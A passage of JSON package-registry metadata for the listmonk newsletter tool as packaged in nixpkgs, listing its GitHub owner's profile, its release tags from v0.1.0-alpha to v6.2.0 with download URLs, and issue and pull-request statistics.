","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-29T20:33:54.722Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/listmonk?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T13:40:04.922Z","issues_count":941,"pull_requests_count":440,"avg_time_to_close_issue":6062913.752307693,"avg_time_to_close_pull_request":1085166.282051282,"issues_closed_count":650,"pull_requests_closed_count":351,"pull_request_authors_count":196,"issue_authors_count":631,"avg_comments_per_issue":2.757704569606801,"avg_comments_per_pull_request":1.1886363636363635,"merged_pull_requests_count":242,"bot_issues_count":0,"bot_pull_requests_count":73,"past_year_issues_count":97,"past_year_pull_requests_count":82,"past_year_avg_time_to_close_issue":3827065.794871795,"past_year_avg_time_to_close_pull_request":605370.9818181818,"past_year_issues_closed_count":39,"past_year_pull_requests_closed_count":55,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":80,"past_year_avg_comments_per_issue":1.7731958762886597,"past_year_avg_comments_per_pull_request":1.2560975609